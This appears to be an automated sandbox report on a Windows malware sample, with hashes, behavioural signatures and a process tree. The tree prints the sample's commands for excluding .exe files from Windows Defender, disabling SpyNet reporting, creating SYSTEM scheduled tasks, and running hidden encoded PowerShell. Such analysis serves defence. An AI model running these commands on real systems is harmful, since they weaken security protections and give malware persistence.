Analysis
-
max time kernel
122s -
max time network
149s -
platform
windows10-2004_x64 -
resource
win10v2004-20221111-en -
resource tags
arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system -
submitted
06-02-2023 23:34
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20220901-en
General
-
Target
file.exe
-
Size
7.3MB
-
MD5
2a394e4469901863d1e0ba494b73af77
-
SHA1
7dca5a43f451705c80ca73aba9f97b21e1a78c6a
-
SHA256
d423233f708e0af70448c973ff07ab25c072a1fe01006ea47ea664c3d371a3ed
-
SHA512
a160fff21bc7faef45fa2185ed854e3223ba6232b01761815e7ab8c6775b77b84989799b6702f87ea21e3dd0ca811111a9963b177529d61131d9b392cbd0acd6
-
SSDEEP
196608:91OIM6e41Qo8DYFol79VtoicAk9YuxSCS/pDF5YwERvq6:3Op141Qo2c+xVt9oY4/SP5YwCq6
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
Processes:
rundll32.exeflow pid process 53 4992 rundll32.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
Install.exerundll32.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
Install.exeaTeDbPf.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Control Panel\International\Geo\Nation Install.exe Key value queried \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Control Panel\International\Geo\Nation aTeDbPf.exe -
Executes dropped EXE 4 IoCs
Processes:
Install.exeInstall.exeFdzMbCA.exeaTeDbPf.exepid process 4960 Install.exe 4868 Install.exe 3828 FdzMbCA.exe 5080 aTeDbPf.exe -
Loads dropped DLL 1 IoCs
Processes:
rundll32.exepid process 4992 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 1 IoCs
Processes:
aTeDbPf.exedescription ioc process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json aTeDbPf.exe -
Drops desktop.ini file(s) 1 IoCs
Processes:
aTeDbPf.exedescription ioc process File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini aTeDbPf.exe -
Drops file in System32 directory 27 IoCs
Processes:
FdzMbCA.exeaTeDbPf.exepowershell.exepowershell.exeInstall.exedescription ioc process File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol FdzMbCA.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData aTeDbPf.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA aTeDbPf.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 aTeDbPf.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E87CE99F124623F95572A696C80EFCAF_450C63FC50977E21DE9DE54EB1509725 aTeDbPf.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_7638F332B8B62A320F9A599D313334B6 aTeDbPf.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 aTeDbPf.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content aTeDbPf.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_7638F332B8B62A320F9A599D313334B6 aTeDbPf.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft aTeDbPf.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA aTeDbPf.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA aTeDbPf.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA aTeDbPf.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies aTeDbPf.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\5FEB33CBE0463E334B23E93A48C2DB5C aTeDbPf.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol aTeDbPf.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE aTeDbPf.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 aTeDbPf.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E87CE99F124623F95572A696C80EFCAF_450C63FC50977E21DE9DE54EB1509725 aTeDbPf.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache aTeDbPf.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\5FEB33CBE0463E334B23E93A48C2DB5C aTeDbPf.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini FdzMbCA.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 aTeDbPf.exe -
Drops file in Program Files directory 14 IoCs
Processes:
aTeDbPf.exedescription ioc process File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak aTeDbPf.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak aTeDbPf.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja aTeDbPf.exe File created C:\Program Files (x86)\RIuAFuLLU\qIsntF.dll aTeDbPf.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi aTeDbPf.exe File created C:\Program Files (x86)\fGfduYyRRUhwWrnEYNR\pGcANWJ.xml aTeDbPf.exe File created C:\Program Files (x86)\FpvksngNCKIjC\hkxIwaD.dll aTeDbPf.exe File created C:\Program Files (x86)\cfvymemHCAUn\gVYGOpK.dll aTeDbPf.exe File created C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi aTeDbPf.exe File created C:\Program Files (x86)\QqSrWmvdGtwU2\qDiwqFm.xml aTeDbPf.exe File created C:\Program Files (x86)\fGfduYyRRUhwWrnEYNR\LeMcYrp.dll aTeDbPf.exe File created C:\Program Files (x86)\RIuAFuLLU\hWSTyae.xml aTeDbPf.exe File created C:\Program Files (x86)\QqSrWmvdGtwU2\kqTIwsJnJtNFa.dll aTeDbPf.exe File created C:\Program Files (x86)\FpvksngNCKIjC\TfhVTUk.xml aTeDbPf.exe -
Drops file in Windows directory 4 IoCs
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exedescription ioc process File created C:\Windows\Tasks\bCfEGNwGDQwhWneLvC.job schtasks.exe File created C:\Windows\Tasks\cfFFKgQyvKFYWQGgS.job schtasks.exe File created C:\Windows\Tasks\qcUOvNLqmSmqpxF.job schtasks.exe File created C:\Windows\Tasks\vdoHbRZAyoFFuVbVu.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 11 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 1152 schtasks.exe 3556 schtasks.exe 4280 schtasks.exe 3808 schtasks.exe 1560 schtasks.exe 1928 schtasks.exe 2268 schtasks.exe 4236 schtasks.exe 1988 schtasks.exe 4724 schtasks.exe 2844 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
Processes:
Install.exerundll32.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
aTeDbPf.exerundll32.exepowershell.exepowershell.exedescription ioc process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" aTeDbPf.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" aTeDbPf.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" aTeDbPf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" aTeDbPf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume aTeDbPf.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix aTeDbPf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{d26ecb05-0000-0000-0000-d01200000000} aTeDbPf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{d26ecb05-0000-0000-0000-d01200000000}\NukeOnDelete = "0" aTeDbPf.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" aTeDbPf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ aTeDbPf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{d26ecb05-0000-0000-0000-d01200000000}\MaxCapacity = "15140" aTeDbPf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer aTeDbPf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing aTeDbPf.exe -
Suspicious behavior: EnumeratesProcesses 44 IoCs
Processes:
powershell.EXEpowershell.exepowershell.exepowershell.EXEaTeDbPf.exepid process 3736 powershell.EXE 3736 powershell.EXE 2452 powershell.exe 2452 powershell.exe 5052 powershell.exe 5052 powershell.exe 4312 powershell.EXE 4312 powershell.EXE 5080 aTeDbPf.exe 5080 aTeDbPf.exe 5080 aTeDbPf.exe 5080 aTeDbPf.exe 5080 aTeDbPf.exe 5080 aTeDbPf.exe 5080 aTeDbPf.exe 5080 aTeDbPf.exe 5080 aTeDbPf.exe 5080 aTeDbPf.exe 5080 aTeDbPf.exe 5080 aTeDbPf.exe 5080 aTeDbPf.exe 5080 aTeDbPf.exe 5080 aTeDbPf.exe 5080 aTeDbPf.exe 5080 aTeDbPf.exe 5080 aTeDbPf.exe 5080 aTeDbPf.exe 5080 aTeDbPf.exe 5080 aTeDbPf.exe 5080 aTeDbPf.exe 5080 aTeDbPf.exe 5080 aTeDbPf.exe 5080 aTeDbPf.exe 5080 aTeDbPf.exe 5080 aTeDbPf.exe 5080 aTeDbPf.exe 5080 aTeDbPf.exe 5080 aTeDbPf.exe 5080 aTeDbPf.exe 5080 aTeDbPf.exe 5080 aTeDbPf.exe 5080 aTeDbPf.exe 5080 aTeDbPf.exe 5080 aTeDbPf.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
powershell.EXEpowershell.exepowershell.exepowershell.EXEdescription pid process Token: SeDebugPrivilege 3736 powershell.EXE Token: SeDebugPrivilege 2452 powershell.exe Token: SeDebugPrivilege 5052 powershell.exe Token: SeDebugPrivilege 4312 powershell.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
file.exeInstall.exeInstall.exeforfiles.exeforfiles.execmd.execmd.exepowershell.EXEFdzMbCA.exepowershell.execmd.exedescription pid process target process PID 3220 wrote to memory of 4960 3220 file.exe Install.exe PID 3220 wrote to memory of 4960 3220 file.exe Install.exe PID 3220 wrote to memory of 4960 3220 file.exe Install.exe PID 4960 wrote to memory of 4868 4960 Install.exe Install.exe PID 4960 wrote to memory of 4868 4960 Install.exe Install.exe PID 4960 wrote to memory of 4868 4960 Install.exe Install.exe PID 4868 wrote to memory of 3468 4868 Install.exe forfiles.exe PID 4868 wrote to memory of 3468 4868 Install.exe forfiles.exe PID 4868 wrote to memory of 3468 4868 Install.exe forfiles.exe PID 4868 wrote to memory of 672 4868 Install.exe forfiles.exe PID 4868 wrote to memory of 672 4868 Install.exe forfiles.exe PID 4868 wrote to memory of 672 4868 Install.exe forfiles.exe PID 672 wrote to memory of 1504 672 forfiles.exe cmd.exe PID 672 wrote to memory of 1504 672 forfiles.exe cmd.exe PID 672 wrote to memory of 1504 672 forfiles.exe cmd.exe PID 3468 wrote to memory of 2356 3468 forfiles.exe cmd.exe PID 3468 wrote to memory of 2356 3468 forfiles.exe cmd.exe PID 3468 wrote to memory of 2356 3468 forfiles.exe cmd.exe PID 2356 wrote to memory of 3860 2356 cmd.exe reg.exe PID 2356 wrote to memory of 3860 2356 cmd.exe reg.exe PID 2356 wrote to memory of 3860 2356 cmd.exe reg.exe PID 1504 wrote to memory of 1484 1504 cmd.exe reg.exe PID 1504 wrote to memory of 1484 1504 cmd.exe reg.exe PID 1504 wrote to memory of 1484 1504 cmd.exe reg.exe PID 2356 wrote to memory of 1452 2356 cmd.exe reg.exe PID 2356 wrote to memory of 1452 2356 cmd.exe reg.exe PID 2356 wrote to memory of 1452 2356 cmd.exe reg.exe PID 1504 wrote to memory of 992 1504 cmd.exe reg.exe PID 1504 wrote to memory of 992 1504 cmd.exe reg.exe PID 1504 wrote to memory of 992 1504 cmd.exe reg.exe PID 4868 wrote to memory of 2844 4868 Install.exe schtasks.exe PID 4868 wrote to memory of 2844 4868 Install.exe schtasks.exe PID 4868 wrote to memory of 2844 4868 Install.exe schtasks.exe PID 4868 wrote to memory of 2268 4868 Install.exe schtasks.exe PID 4868 wrote to memory of 2268 4868 Install.exe schtasks.exe PID 4868 wrote to memory of 2268 4868 Install.exe schtasks.exe PID 3736 wrote to memory of 2568 3736 powershell.EXE gpupdate.exe PID 3736 wrote to memory of 2568 3736 powershell.EXE gpupdate.exe PID 4868 wrote to memory of 2664 4868 Install.exe schtasks.exe PID 4868 wrote to memory of 2664 4868 Install.exe schtasks.exe PID 4868 wrote to memory of 2664 4868 Install.exe schtasks.exe PID 4868 wrote to memory of 4280 4868 Install.exe schtasks.exe PID 4868 wrote to memory of 4280 4868 Install.exe schtasks.exe PID 4868 wrote to memory of 4280 4868 Install.exe schtasks.exe PID 3828 wrote to memory of 2452 3828 FdzMbCA.exe powershell.exe PID 3828 wrote to memory of 2452 3828 FdzMbCA.exe powershell.exe PID 3828 wrote to memory of 2452 3828 FdzMbCA.exe powershell.exe PID 2452 wrote to memory of 3852 2452 powershell.exe cmd.exe PID 2452 wrote to memory of 3852 2452 powershell.exe cmd.exe PID 2452 wrote to memory of 3852 2452 powershell.exe cmd.exe PID 3852 wrote to memory of 3764 3852 cmd.exe reg.exe PID 3852 wrote to memory of 3764 3852 cmd.exe reg.exe PID 3852 wrote to memory of 3764 3852 cmd.exe reg.exe PID 2452 wrote to memory of 616 2452 powershell.exe reg.exe PID 2452 wrote to memory of 616 2452 powershell.exe reg.exe PID 2452 wrote to memory of 616 2452 powershell.exe reg.exe PID 2452 wrote to memory of 2000 2452 powershell.exe reg.exe PID 2452 wrote to memory of 2000 2452 powershell.exe reg.exe PID 2452 wrote to memory of 2000 2452 powershell.exe reg.exe PID 2452 wrote to memory of 1508 2452 powershell.exe reg.exe PID 2452 wrote to memory of 1508 2452 powershell.exe reg.exe PID 2452 wrote to memory of 1508 2452 powershell.exe reg.exe PID 2452 wrote to memory of 3928 2452 powershell.exe reg.exe PID 2452 wrote to memory of 3928 2452 powershell.exe reg.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS9CF0.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS9FDE.tmp\Install.exe.\Install.exe /S /site_id "525403"3⤵
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gxyWKknki" /SC once /ST 00:28:56 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gxyWKknki"4⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gxyWKknki"4⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bCfEGNwGDQwhWneLvC" /SC once /ST 00:35:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\qOrnnoslxFEibVOnF\ChQsEQNyswpenHU\FdzMbCA.exe\" pb /site_id 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Users\Admin\AppData\Local\Temp\qOrnnoslxFEibVOnF\ChQsEQNyswpenHU\FdzMbCA.exeC:\Users\Admin\AppData\Local\Temp\qOrnnoslxFEibVOnF\ChQsEQNyswpenHU\FdzMbCA.exe pb /site_id 525403 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
-
